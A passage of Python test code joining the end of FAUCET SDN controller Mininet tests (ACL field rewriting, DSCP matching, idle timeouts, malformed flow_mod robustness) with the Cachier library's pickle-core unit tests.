return '0e:00:00:00:00:03'
REWRITE_MAC = rewrite_mac()
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "%s"
actions:
allow: 1
output:
- set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (override_mac(), rewrite_mac())
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the rewritten mac address.
tcpdump_filter = ('icmp and ether dst %s' % self.REWRITE_MAC)
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), self.OVERRIDE_MAC)),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
timeout=5, packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
def verify_dest_rewrite(self, source_host, overridden_host, rewrite_host, tcpdump_host):
overridden_host.setMAC(self.OVERRIDE_MAC)
rewrite_host.setMAC(self.REWRITE_MAC)
rewrite_host.cmd('arp -s %s %s' % (overridden_host.IP(), overridden_host.MAC()))
rewrite_host.cmd(' '.join((self.FPINGS_ARGS_ONE, overridden_host.IP())))
self.wait_until_matching_flow(
{'dl_dst': self.REWRITE_MAC},
table_id=self._ETH_DST_TABLE,
actions=['OUTPUT:%u' % self.port_map['port_3']])
tcpdump_filter = ('icmp and ether src %s and ether dst %s' % (
source_host.MAC(), rewrite_host.MAC()))
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: source_host.cmd(
'arp -s %s %s' % (rewrite_host.IP(), overridden_host.MAC())),
# this will fail if no reply
lambda: self.one_ipv4_ping(
source_host, rewrite_host.IP(), require_host_learned=False)],
timeout=3, packets=1)
# ping from h1 to h2.mac should appear in third host, and not second host, as
# the acl should rewrite the dst mac.
self.assertFalse(re.search(
'%s: ICMP echo request' % rewrite_host.IP(), tcpdump_txt))
def test_switching(self):
"""Tests that a acl can rewrite the destination mac address,
and the packet will only go out the port of the new mac.
(Continues through faucet pipeline)
"""
source_host, overridden_host, rewrite_host = self.hosts_name_ordered()[0:3]
self.verify_dest_rewrite(
source_host, overridden_host, rewrite_host, overridden_host)
class FaucetSetFieldsTest(FaucetUntaggedTest):
# A generic test to verify that a flow will set fields specified for
# matching packets
OUTPUT_MAC = '0f:00:12:23:48:03'
SRC_MAC = '0f:12:00:00:00:ff'
IP_DSCP_VAL = 46
# this is the converted DSCP value that is displayed
NW_TOS_VAL = 184
IPV4_SRC_VAL = "192.0.2.0"
IPV4_DST_VAL = "198.51.100.0"
# ICMP echo request
ICMPV4_TYPE_VAL = 8
UDP_SRC_PORT = 68
UDP_DST_PORT = 67
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_type: 0x0800
actions:
allow: 1
output:
set_fields:
- ipv4_src: '%s'
- ipv4_dst: '%s'
- ip_dscp: %d
- rule:
eth_type: 0x0800
ip_proto: 1
actions:
allow: 1
output:
set_fields:
- icmpv4_type: %d
""" % (IPV4_SRC_VAL, IPV4_DST_VAL, IP_DSCP_VAL, ICMPV4_TYPE_VAL)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_set_fields_generic_udp(self):
# Send a basic UDP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send a UDP packet
scapy_pkt = self.scapy_base_udp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), self.UDP_DST_PORT, self.UDP_SRC_PORT,
dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has the
# overwritten values
self.assertTrue(
re.search("%s.%s > %s.%s" % (self.IPV4_SRC_VAL, self.UDP_SRC_PORT,
self.IPV4_DST_VAL, self.UDP_DST_PORT),
tcpdump_txt))
# check the packet's converted dscp value
self.assertTrue(re.search("tos %s" % hex(self.NW_TOS_VAL), tcpdump_txt))
def test_set_fields_icmp(self):
# Send a basic ICMP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send an ICMP packet
scapy_pkt = self.scapy_icmp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has been
# overwritten to be an ICMP echo request
self.assertTrue(re.search("ICMP echo request", tcpdump_txt))
def test_untagged(self):
pass
class FaucetOrderedSetFieldsTest(FaucetUntaggedTest):
# A generic test to verify that a flow will set fields specified for
# matching packets
OUTPUT_MAC = '0f:00:12:23:48:03'
SRC_MAC = '0f:12:00:00:00:ff'
IP_DSCP_VAL = 46
# this is the converted DSCP value that is displayed
NW_TOS_VAL = 184
IPV4_SRC_VAL = "192.0.2.0"
IPV4_DST_VAL = "198.51.100.0"
# ICMP echo request
ICMPV4_TYPE_VAL = 8
UDP_SRC_PORT = 68
UDP_DST_PORT = 67
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_type: 0x0800
actions:
allow: 1
output:
- set_fields:
- ipv4_src: '%s'
- ipv4_dst: '%s'
- ip_dscp: %d
- rule:
eth_type: 0x0800
ip_proto: 1
actions:
allow: 1
output:
- set_fields:
- icmpv4_type: %d
""" % (IPV4_SRC_VAL, IPV4_DST_VAL, IP_DSCP_VAL, ICMPV4_TYPE_VAL)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_set_fields_generic_udp(self):
# Send a basic UDP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send a UDP packet
scapy_pkt = self.scapy_base_udp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), self.UDP_DST_PORT, self.UDP_SRC_PORT,
dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has the
# overwritten values
self.assertTrue(
re.search("%s.%s > %s.%s" % (self.IPV4_SRC_VAL, self.UDP_SRC_PORT,
self.IPV4_DST_VAL, self.UDP_DST_PORT),
tcpdump_txt))
# check the packet's converted dscp value
self.assertTrue(re.search("tos %s" % hex(self.NW_TOS_VAL), tcpdump_txt))
def test_set_fields_icmp(self):
# Send a basic ICMP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send an ICMP packet
scapy_pkt = self.scapy_icmp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has been
# overwritten to be an ICMP echo request
self.assertTrue(re.search("ICMP echo request", tcpdump_txt))
def test_untagged(self):
pass
class FaucetDscpMatchTest(FaucetUntaggedTest):
# Match all packets with this IP_DSP and eth_type, based on the ryu API def
# e.g {"ip_dscp": 3, "eth_type": 2048}
# Note: the ip_dscp field is translated to nw_tos in OpenFlow 1.0:
# see https://tools.ietf.org/html/rfc2474#section-3
IP_DSCP_MATCH = 46
ETH_TYPE = 2048
SRC_MAC = '0e:00:00:00:00:ff'
DST_MAC = '0e:00:00:00:00:02'
REWRITE_MAC = '0f:00:12:23:48:03'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
ip_dscp: %d
dl_type: 0x800
actions:
allow: 1
output:
set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (IP_DSCP_MATCH, REWRITE_MAC)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Tests that a packet with an ip_dscp field will be appropriately
# matched and proceeds through the faucet pipeline. This test verifies
# that packets with the dscp field can have their eth_dst field modified
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.REWRITE_MAC)
self.wait_until_matching_flow(
{'ip_dscp': self.IP_DSCP_MATCH,
'eth_type': self.ETH_TYPE},
table_id=self._PORT_ACL_TABLE)
# scapy command to create and send a packet with the specified fields
scapy_pkt = self.scapy_dscp(self.SRC_MAC, self.DST_MAC, 184,
source_host.defaultIntf())
tcpdump_filter = "ether dst %s" % self.REWRITE_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host is from the
# source MAC address
self.assertTrue(re.search("%s > %s" % (self.SRC_MAC, self.REWRITE_MAC),
tcpdump_txt))
class FaucetOrderedDscpMatchTest(FaucetUntaggedTest):
# Match all packets with this IP_DSP and eth_type, based on the ryu API def
# e.g {"ip_dscp": 3, "eth_type": 2048}
# Note: the ip_dscp field is translated to nw_tos in OpenFlow 1.0:
# see https://tools.ietf.org/html/rfc2474#section-3
IP_DSCP_MATCH = 46
ETH_TYPE = 2048
SRC_MAC = '0e:00:00:00:00:ff'
DST_MAC = '0e:00:00:00:00:02'
REWRITE_MAC = '0f:00:12:23:48:03'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
ip_dscp: %d
dl_type: 0x800
actions:
allow: 1
output:
- set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (IP_DSCP_MATCH, REWRITE_MAC)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Tests that a packet with an ip_dscp field will be appropriately
# matched and proceeds through the faucet pipeline. This test verifies
# that packets with the dscp field can have their eth_dst field modified
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.REWRITE_MAC)
self.wait_until_matching_flow(
{'ip_dscp': self.IP_DSCP_MATCH,
'eth_type': self.ETH_TYPE},
table_id=self._PORT_ACL_TABLE)
# scapy command to create and send a packet with the specified fields
scapy_pkt = self.scapy_dscp(self.SRC_MAC, self.DST_MAC, 184,
source_host.defaultIntf())
tcpdump_filter = "ether dst %s" % self.REWRITE_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host is from the
# source MAC address
self.assertTrue(re.search("%s > %s" % (self.SRC_MAC, self.REWRITE_MAC),
tcpdump_txt))
@unittest.skip('use_idle_timeout unreliable')
class FaucetWithUseIdleTimeoutTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
timeout: 1
use_idle_timeout: True
""" + CONFIG_BOILER_UNTAGGED
def wait_for_host_removed(self, host, in_port, timeout=5):
for _ in range(timeout):
if not self.host_learned(host, in_port=in_port, timeout=1):
return
self.fail('host %s still learned' % host)
def wait_for_flowremoved_msg(self, src_mac=None, dst_mac=None, timeout=30):
pattern = "OFPFlowRemoved"
mac = None
if src_mac:
pattern = "OFPFlowRemoved(.*)'eth_src': '%s'" % src_mac
mac = src_mac
if dst_mac:
pattern = "OFPFlowRemoved(.*)'eth_dst': '%s'" % dst_mac
mac = dst_mac
for _ in range(timeout):
for _, debug_log_name in self._get_ofchannel_logs():
with open(debug_log_name) as debug_log:
debug = debug_log.read()
if re.search(pattern, debug):
return
time.sleep(1)
self.fail('Not received OFPFlowRemoved for host %s' % mac)
def wait_for_host_log_msg(self, host_mac, msg):
log_file = self.env['faucet']['FAUCET_LOG']
host_log_re = r'.*%s %s.*' % (msg, host_mac)
self.wait_until_matching_lines_from_file(host_log_re, log_file)
def test_untagged(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[:2]
self.swap_host_macs(first_host, second_host)
for host, port in (
(first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])):
self.wait_for_flowremoved_msg(src_mac=host.MAC())
self.require_host_learned(host, in_port=int(port))
@unittest.skip('use_idle_timeout unreliable')
class FaucetWithUseIdleTimeoutRuleExpiredTest(FaucetWithUseIdleTimeoutTest):
def test_untagged(self):
"""Host that is actively sending should have its dst rule renewed as the
rule expires. Host that is not sending expires as usual.
"""
self.ping_all_when_learned()
first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()
self.host_ipv4_alias(first_host, ipaddress.ip_interface('10.99.99.1/24'))
first_host.cmd('arp -s %s %s' % (second_host.IP(), second_host.MAC()))
first_host.cmd('timeout 120s ping -I 10.99.99.1 %s &' % second_host.IP())
for host in (second_host, third_host, fourth_host):
self.host_drop_all_ips(host)
self.wait_for_host_log_msg(first_host.MAC(), 'refreshing host')
self.assertTrue(self.host_learned(
first_host, in_port=int(self.port_map['port_1'])))
for host, port in (
(second_host, self.port_map['port_2']),
(third_host, self.port_map['port_3']),
(fourth_host, self.port_map['port_4'])):
self.wait_for_flowremoved_msg(src_mac=host.MAC())
self.wait_for_host_log_msg(host.MAC(), 'expiring host')
self.wait_for_host_removed(host, in_port=int(port))
class FaucetDisconnectTest(FaucetUntaggedTest):
"""Test that switch works properly after repeated disconnections
caused by DPID mismatch"""
def update_config(self, dpid):
"""Update config with good/bad DPID"""
conf = self._get_faucet_conf()
conf['dps'][self.DP_NAME]['dp_id'] = int(dpid)
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=False)
def test_untagged(self):
"""Run untagged test after disconnects and config update"""
# We update the config with a bad DPID and then wait for
# 'unknown datapath' messages, indicating switch connections that
# FAUCET has rejected. The switch should see them as
# 'connection reset by peer'.
mask = int(16*'f', 16)
bad_dpid = (int(self.dpid) + 0xdeadbeef) & mask
faucet_log = self.env['faucet']['FAUCET_LOG']
self.update_config(dpid=bad_dpid)
self.wait_until_matching_lines_from_file(
r'.*ERROR.*unknown datapath', faucet_log, timeout=60, count=4)
self.update_config(dpid=self.dpid)
super().test_untagged()
class FaucetBadFlowModTest(FaucetUntaggedTest):
"""Test that switch and FAUCET still work after we send some bad flow_mods"""
def base_flow_mod(self):
"""Return a base flow mod that we mess with"""
return {'dpid': self.dpid,
'cookie': 0,
'cookie_mask': 0,
'table_id': 0,
'idle_timeout': 29,
'hard_timeout': 91,
'flags': 1,
'priority': 1,
'match': {'in_port': 1},
'actions': [{
'type': 'OUTPUT',
'port': 2}]}
# For now, the flow_mods are reasonably well-formed but with
# parameters that are incorrect for the switch and for FAUCET
def bad_dpid(self):
"""Return a random, bad dpid parameter"""
mask = int(16*'f', 16)
dpid = (int(self.dpid) + random.randint(0, 1 << 63)) & mask
return {'dpid': dpid}
@staticmethod
def bad_table():
"""Return a bad table ID parameter"""
# This should be higher than FAUCET's max table ID
bad_table_start = 32
return {'table_id': random.randint(bad_table_start, 100)}
def bad_port(self):
"""Return a (hopefully very) bad port number"""
max_port = max(self.port_map.values())
offset = random.randint(0x1000, 0xE0000000)
mask = 0xEFFFFFFF
return (max_port + offset) & mask
def bad_match(self):
"""Return a bad match field"""
matches = (
# Bad input port
{'in_port': self.bad_port()},
# IPv4 (broadcast) src with bad ('reserved') ethertype
{'nw_src': '255.255.255.255', 'dl_type': 0xFFFF},
# IPv4 with IPv6 ethertype:
{'nw_src': '1.2.3.4', 'dl_type': 0x86DD},
# IPv4 address as IPv6 dst
{'ipv6_dst': '1.2.3.4', 'dl_type': 0x86DD},
# IPv6 dst with Bad/reserved ip_proto
{'ipv6_dst': '2001::aaaa:bbbb:cccc:1111', 'ip_proto': 255},
# Destination port but no transport protocol
{'tp_dst': 80},
# ARP opcode on non-ARP packetx
{'arp_op': 0x3, 'dl_type': 0x1234})
match = random.sample(matches, 1)[0]
return {'match': match}
def bad_actions(self, count=1):
"""Return a questionable actions parameter"""
actions = (
{'type': 'OUTPUT', 'port': self.bad_port()},
{'type': 'PUSH_MPLS', 'ethertype': 0x8BAD},
{'type': 'SET_QUEUE', 'queue_id':
random.randint(0x8000, 0xFFFFFFFF)})
return {'actions': random.sample(actions, count)}
# Possible options for bad parameters
bad_options = ('dpid', 'table', 'match', 'actions')
def bad_flow_mod(self):
"""Return a flow mod with some bad parameters"""
flow_mod = self.base_flow_mod()
# Add two or more bad options
options = random.sample(self.bad_options,
random.randint(2, len(self.bad_options)))
for option in options:
param = getattr(self, 'bad_%s' % option)()
flow_mod.update(param)
return flow_mod
def send_flow_mod(self, flow_mod, timeout=5):
"""Send flow_mod to switch via ofctl"""
int_dpid = mininet_test_util.str_int_dpid(self.dpid)
return self._ofctl_post(int_dpid, 'stats/flowentry/modify',
timeout=timeout, params=flow_mod)
def tearDown(self, ignore_oferrors=True):
"""Ignore OF errors on teardown"""
oferrors = super().tearDown(ignore_oferrors)
oferrors = re.findall(r'type: (\w+)', oferrors)
counter = collections.Counter(oferrors)
error('Ignored OF error count: %s\n' % dict(counter))
# TODO: ensure at least one error is always generated.
# pylint: disable=arguments-differ
def test_untagged(self, count=10):
"""Send a bunch of bad flow mods, then verify connectivity"""
for _ in range(count):
flow_mod = self.bad_flow_mod()
error('sending bad flow_mod', flow_mod, '\n')
self.send_flow_mod(flow_mod)
self.ping_all_when_learned()
class FaucetUntaggedMorePortsBase(FaucetUntaggedTest):
"""Base class for untagged test with more ports"""
# pylint: disable=invalid-name
N_UNTAGGED = 16 # Maximum number of ports to test
EVENT_LOGGER_TIMEOUT = 180 # Timeout for event logger process
# Config lines for additional ports
CONFIG_EXTRA_PORT = """
{port}:
native_vlan: 100""" + "\n"
def _init_faucet_config(self): # pylint: disable=invalid-name
"""Extend config with more ports if needed"""
self.assertTrue(self.CONFIG.endswith(CONFIG_BOILER_UNTAGGED))
# We know how to extend the config for more ports
base_port_count = len(re.findall('port', CONFIG_BOILER_UNTAGGED))
ports = self.topo.dpid_ports(self.dpid)
for port in ports[base_port_count:]:
self.CONFIG += self.CONFIG_EXTRA_PORT.format(port=port)
super()._init_faucet_config()
def setUp(self):
"""Make sure N_UNTAGGED doesn't exceed hw port count"""
if self.config and self.config.get('hw_switch', False):
self.N_UNTAGGED = min(len(self.config['dp_ports']),
self.N_UNTAGGED)
error('(%d ports) ' % self.N_UNTAGGED)
super().setUp()
class FaucetSingleUntagged32PortTest(FaucetUntaggedMorePortsBase):
"""Untagged test with up to 32 ports"""
# pylint: disable=invalid-name
N_UNTAGGED = 32 # Maximum number of ports to test
@unittest.skip('slow and potentially unreliable on travis')
class FaucetSingleUntagged48PortTest(FaucetUntaggedMorePortsBase):
"""Untagged test with up to 48 ports"""
# pylint: disable=invalid-name
N_UNTAGGED = 48 # Maximum number of ports to test
EVENT_LOGGER_TIMEOUT = 360 # Timeout for event logger process
|
test_pickle_core.py
|
"""Test for the Cachier python package."""
# This file is part of Cachier.
# https://github.com/shaypal5/cachier
# Licensed under the MIT license:
# http://www.opensource.org/licenses/MIT-license
# Copyright (c) 2016, Shay Palachy <shaypal5@gmail.com>
# from os.path import (
# realpath,
# dirname
# )
import os
from time import (
time,
sleep
)
from datetime import timedelta
from random import random
import threading
try:
import queue
except ImportError: # python 2
import Queue as queue
import hashlib
import pandas as pd
from cachier import cachier
from cachier.pickle_core import DEF_CACHIER_DIR
# Pickle core tests
@cachier(next_time=False)
def _takes_5_seconds(arg_1, arg_2):
"""Some function."""
sleep(5)
return 'arg_1:{}, arg_2:{}'.format(arg_1, arg_2)
def test_pickle_core():
"""Basic Pickle core functionality."""
_takes_5_seconds.clear_cache()
_takes_5_seconds('a', 'b')
start = time()
_takes_5_seconds('a', 'b', verbose_cache=True)
end = time()
assert end - start < 1
_takes_5_seconds.clear_cache()
SECONDS_IN_DELTA = 3
DELTA = timedelta(seconds=SECONDS_IN_DELTA)
@cachier(stale_after=DELTA, next_time=False)
def _stale_after_seconds(arg_1, arg_2):
"""Some function."""
return random()
def test_stale_after():
"""Testing the stale_after functionality."""
_stale_after_seconds.clear_cache()
val1 = _stale_after_seconds(1, 2)
val2 = _stale_after_seconds(1, 2)
val3 = _stale_after_seconds(1, 3)
assert val1 == val2
assert val1 != val3
sleep(3)
val4 = _stale_after_seconds(1, 2)
assert val4 != val1
_stale_after_seconds.clear_cache()
@cachier(stale_after=DELTA, next_time=True)
def _stale_after_next_time(arg_1, arg_2):
"""Some function."""
return random()
def test_stale_after_next_time():
"""Testing the stale_after with next_time functionality."""
_stale_after_next_time.clear_cache()
val1 = _stale_after_next_time(1, 2)
val2 = _stale_after_next_time(1, 2)
val3 = _stale_after_next_time(1, 3)
assert val1 == val2
assert val1 != val3
sleep(SECONDS_IN_DELTA + 1)
val4 = _stale_after_next_time(1, 2)
assert val4 == val1
sleep(0.5)
val5 = _stale_after_next_time(1, 2)
assert val5 != val1
_stale_after_next_time.clear_cache()
@cachier()
def _random_num():
return random()
@cachier()
def _random_num_with_arg(a):
# print(a)
return random()
def test_overwrite_cache():
"""Tests that the overwrite feature works correctly."""
_random_num.clear_cache()
int1 = _random_num()
int2 = _random_num()
assert int2 == int1
int3 = _random_num(overwrite_cache=True)
assert int3 != int1
int4 = _random_num()
assert int4 == int3
_random_num.clear_cache()
_random_num_with_arg.clear_cache()
int1 = _random_num_with_arg('a')
int2 = _random_num_with_arg('a')
assert int2 == int1
int3 = _random_num_with_arg('a', overwrite_cache=True)
assert int3 != int1
int4 = _random_num_with_arg('a')
assert int4 == int3
_random_num_with_arg.clear_cache()
def test_ignore_cache():
"""Tests that the ignore_cache feature works correctly."""
_random_num.clear_cache()
int1 = _random_num()
int2 = _random_num()
assert int2 == int1
int3 = _random_num(ignore_cache=True)
assert int3 != int1
int4 = _random_num()
assert int4 != int3
assert int4 == int1
_random_num.clear_cache()
_random_num_with_arg.clear_cache()
int1 = _random_num_with_arg('a')
int2 = _random_num_with_arg('a')
assert int2 == int1
int3 = _random_num_with_arg('a', ignore_cache=True)
assert int3 != int1
int4 = _random_num_with_arg('a')
assert int4 != int3
assert int4 == int1
_random_num_with_arg.clear_cache()
@cachier()
def _takes_time(arg_1, arg_2):
"""Some function."""
sleep(2) # this has to be enough time for check_calculation to run twice
return random() + arg_1 + arg_2
def _calls_takes_time(res_queue):
res = _takes_time(0.13, 0.02)
res_queue.put(res)
def test_pickle_being_calculated():
"""Testing pickle core handling of being calculated scenarios."""
_takes_time.clear_cache()
res_queue = queue.Queue()
thread1 = threading.Thread(
target=_calls_takes_time, kwargs={'res_queue': res_queue})
thread2 = threading.Thread(
target=_calls_takes_time, kwargs={'res_queue': res_queue})
thread1.start()
sleep(0.5)
thread2.start()
thread1.join()
thread2.join()
assert res_queue.qsize() == 2
res1 = res_queue.get()
res2 = res_queue.get()
assert res1 == res2
@cachier(stale_after=timedelta(seconds=1), next_time=True)
def _being_calc_next_time(arg_1, arg_2):
"""Some function."""
sleep(1)
return random() + arg_1 + arg_2
def _calls_being_calc_next_time(res_queue):
res = _being_calc_next_time(0.13, 0.02)
res_queue.put(res)
def test_being_calc_next_time():
"""Testing pickle core handling of being calculated scenarios."""
_takes_time.clear_cache()
_being_calc_next_time(0.13, 0.02)
sleep(1.1)
res_queue = queue.Queue()
thread1 = threading.Thread(
target=_calls_being_calc_next_time, kwargs={'res_queue': res_queue})
thread2 = threading.Thread(
target=_calls_being_calc_next_time, kwargs={'res_queue': res_queue})
thread1.start()
sleep(0.5)
thread2.start()
thread1.join()
thread2.join()
assert res_queue.qsize() == 2
res1 = res_queue.get()
res2 = res_queue.get()
assert res1 == res2
@cachier()
def _bad_cache(arg_1, arg_2):
"""Some function."""
sleep(1)
return random() + arg_1 + arg_2
# _BAD_CACHE_FNAME = '.__main__._bad_cache'
_BAD_CACHE_FNAME = '.tests.test_pickle_core._bad_cache'
EXPANDED_CACHIER_DIR = os.path.expanduser(DEF_CACHIER_DIR)
_BAD_CACHE_FPATH = os.path.join(EXPANDED_CACHIER_DIR, _BAD_CACHE_FNAME)
def _calls_bad_cache(res_queue, trash_cache):
try:
res = _bad_cache(0.13, 0.02)
if trash_cache:
with open(_BAD_CACHE_FPATH, 'w') as cache_file:
cache_file.seek(0)
cache_file.truncate()
res_queue.put(res)
except Exception as exc: # skipcq: PYL-W0703
res_queue.put(exc)
def _helper_bad_cache_file(sleeptime):
"""Test pickle core handling of bad cache files."""
_bad_cache.clear_cache()
res_queue = queue.Queue()
thread1 = threading.Thread(
target=_calls_bad_cache,
kwargs={'res_queue': res_queue, 'trash_cache': True})
thread2 = threading.Thread(
target=_calls_bad_cache,
kwargs={'res_queue': res_queue, 'trash_cache': False})
thread1.start()
sleep(sleeptime)
thread2.start()
thread1.join()
thread2.join()
if not res_queue.qsize() == 2:
return False
res1 = res_queue.get()
if not isinstance(res1, float):
return False
res2 = res_queue.get()
if not (res2 is None) or isinstance(res2, KeyError):
return False
return True
# we want this to succeed at leat once
def test_bad_cache_file():
"""Test pickle core handling of bad cache files."""
sleeptimes = [0.5, 0.1, 0.2, 0.3, 0.8, 1, 2]
sleeptimes = sleeptimes + sleeptimes
for sleeptime in sleeptimes:
if _helper_bad_cache_file(sleeptime):
return
assert False
@cachier()
def _delete_cache(arg_1, arg_2):
"""Some function."""
sleep(1)
return random() + arg_1 + arg_2
# _DEL_CACHE_FNAME = '.__main__._delete_cache'
_DEL_CACHE_FNAME = '.tests.test_pickle_core._delete_cache'
_DEL_CACHE_FPATH = os.path.join(EXPANDED_CACHIER_DIR, _DEL_CACHE_FNAME)
def _calls_delete_cache(res_queue, del_cache):
try:
# print('in')
res = _delete_cache(0.13, 0.02)
# print('out with {}'.format(res))
if del_cache:
# print('deleteing!')
os.remove(_DEL_CACHE_FPATH)
# print(os.path.isfile(_DEL_CACHE_FPATH))
res_queue.put(res)
except Exception as exc: # skipcq: PYL-W0703
# print('found')
res_queue.put(exc)
def _helper_delete_cache_file(sleeptime):
"""Test pickle core handling of missing cache files."""
_delete_cache.clear_cache()
res_queue = queue.Queue()
thread1 = threading.Thread(
target=_calls_delete_cache,
kwargs={'res_queue': res_queue, 'del_cache': True})
thread2 = threading.Thread(
target=_calls_delete_cache,
kwargs={'res_queue': res_queue, 'del_cache': False})
thread1.start()
sleep(sleeptime)
thread2.start()
thread1.join()
thread2.join()
if not res_queue.qsize() == 2:
return False
res1 = res_queue.get()
# print(res1)
if not isinstance(res1, float):
return False
res2 = res_queue.get()
if not ((isinstance(res2, KeyError)) or ((res2 is None))):
return False
return True
# print(res2)
# print(type(res2))
def test_delete_cache_file():
"""Test pickle core handling of missing cache files."""
sleeptimes = [0.5, 0.3, 0.1, 0.2, 0.8, 1, 2]
sleeptimes = sleeptimes + sleeptimes
for sleeptime in sleeptimes:
if _helper_delete_cache_file(sleeptime):
return
assert False
def test_clear_being_calculated():
"""Test pickle core clear `being calculated` functionality."""
_takes_time.clear_being_calculated()
@cachier(stale_after=timedelta(seconds=1), next_time=True)
def _error_throwing_func(arg1):
if not hasattr(_error_throwing_func, 'count'):
_error_throwing_func.count = 0
_error_throwing_func.count += 1
if _error_throwing_func.count > 1:
raise ValueError("Tiny Rick!")
return 7
def test_error_throwing_func():
# with
res1 = _error_throwing_func(4)
sleep(1.5)
res2 = _error_throwing_func(4)
assert res1 == res2
# test custom cache dir for pickle core
CUSTOM_DIR = '~/.exparrot'
EXPANDED_CUSTOM_DIR = os.path.expanduser(CUSTOM_DIR)
@cachier(next_time=False, cache_dir=CUSTOM_DIR)
def _takes_5_seconds_custom_dir(arg_1, arg_2):
"""Some function."""
sleep(5)
return 'arg_1:{}, arg_2:{}'.format(arg_1, arg_2)
def test_pickle_core_custom_cache_dir():
"""Basic Pickle core functionality."""
_takes_5_seconds_custom_dir.clear_cache()
_takes_5_seconds_custom_dir('a', 'b')
start = time()
_takes_5_seconds_custom_dir('a', 'b', verbose_cache=True)
end = time()
assert end - start < 1
_takes_5_seconds_custom_dir.clear_cache()
assert _takes_5_seconds_custom_dir.cache_dpath() == EXPANDED_CUSTOM_DIR
def test_callable_hash_param():
def _hash_params(args, kwargs):
def _hash(obj):
if isinstance(obj, pd.core.frame.DataFrame):
return hashlib.sha256(pd.util.hash_pandas_object(obj).values.tobytes()).hexdigest()
return obj
k_args = tuple(map(_hash, args))
k_kwargs = tuple(sorted({k: _hash(v) for k, v in kwargs.items()}.items()))
return k_args + k_kwargs
@cachier(hash_params=_hash_params)
def _params_with_dataframe(*args, **kwargs):
"""Some function."""
return random()
